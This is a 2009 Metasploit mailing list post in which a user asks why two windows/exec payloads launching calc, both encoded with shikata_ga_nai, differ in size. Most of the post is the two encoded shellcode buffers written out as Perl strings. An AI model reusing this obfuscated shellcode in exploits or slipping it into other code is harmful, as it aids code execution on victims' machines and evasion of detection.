Metasploit mailing list archives

different payload size

From: "Aczire" <aczire () gmail com>
Date: Sat, 19 Dec 2009 18:21:50 +0530

Hi all,

 

Watz the difference between these two, same for me, but..

 

# windows/exec - 223 bytes

# http://www.metasploit.com

# Encoder: x86/shikata_ga_nai

# EXITFUNC=seh, CMD=calc

my $buf = 

"\xdd\xc6\xbe\x2d\xf5\x15\xc4\x2b\xc9\xb1\x32\xd9\x74\x24" .

"\xf4\x58\x31\x70\x17\x03\x70\x17\x83\xc5\x09\xf7\x31\xe9" .

"\x1a\x71\xb9\x11\xdb\xe2\x33\xf4\xea\x30\x27\x7d\x5e\x85" .

"\x23\xd3\x53\x6e\x61\xc7\xe0\x02\xae\xe8\x41\xa8\x88\xc7" .

"\x52\x1c\x15\x8b\x91\x3e\xe9\xd1\xc5\xe0\xd0\x1a\x18\xe0" .

"\x15\x46\xd3\xb0\xce\x0d\x46\x25\x7a\x53\x5b\x44\xac\xd8" .

"\xe3\x3e\xc9\x1e\x97\xf4\xd0\x4e\x08\x82\x9b\x76\x22\xcc" .

"\x3b\x87\xe7\x0e\x07\xce\x8c\xe5\xf3\xd1\x44\x34\xfb\xe0" .

"\xa8\x9b\xc2\xcd\x24\xe5\x03\xe9\xd6\x90\x7f\x0a\x6a\xa3" .

"\xbb\x71\xb0\x26\x5e\xd1\x33\x90\xba\xe0\x90\x47\x48\xee" .

"\x5d\x03\x16\xf2\x60\xc0\x2c\x0e\xe8\xe7\xe2\x87\xaa\xc3" .

"\x26\xcc\x69\x6d\x7e\xa8\xdc\x92\x60\x14\x80\x36\xea\xb6" .

"\xd5\x41\xb1\xdc\x28\xc3\xcf\x99\x2b\xdb\xcf\x89\x43\xea" .

"\x44\x46\x13\xf3\x8e\x23\xe5\x02\x03\xb9\x72\xbd\xf6\x80" .

"\x1e\x3e\x2d\xc6\x26\xbd\xc4\xb6\xdc\xdd\xac\xb3\x99\x59" .

"\x5c\xc9\xb2\x0f\x62\x7e\xb2\x05\x01\xe1\x20\xc5\xc6";

 

 

 

# windows/exec - 144 bytes

# http://www.metasploit.com

# Encoder: x86/shikata_ga_nai

# EXITFUNC=seh, CMD=calc

$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .

"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .

"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .

"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .

"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .

"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .

"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .

"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .

"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .

"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .

"\x7f\xe8\x7b\xca";

 

What am I missing?

 

Thanks in advance,

Acz

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

Current thread:

different payload size Aczire (Dec 19)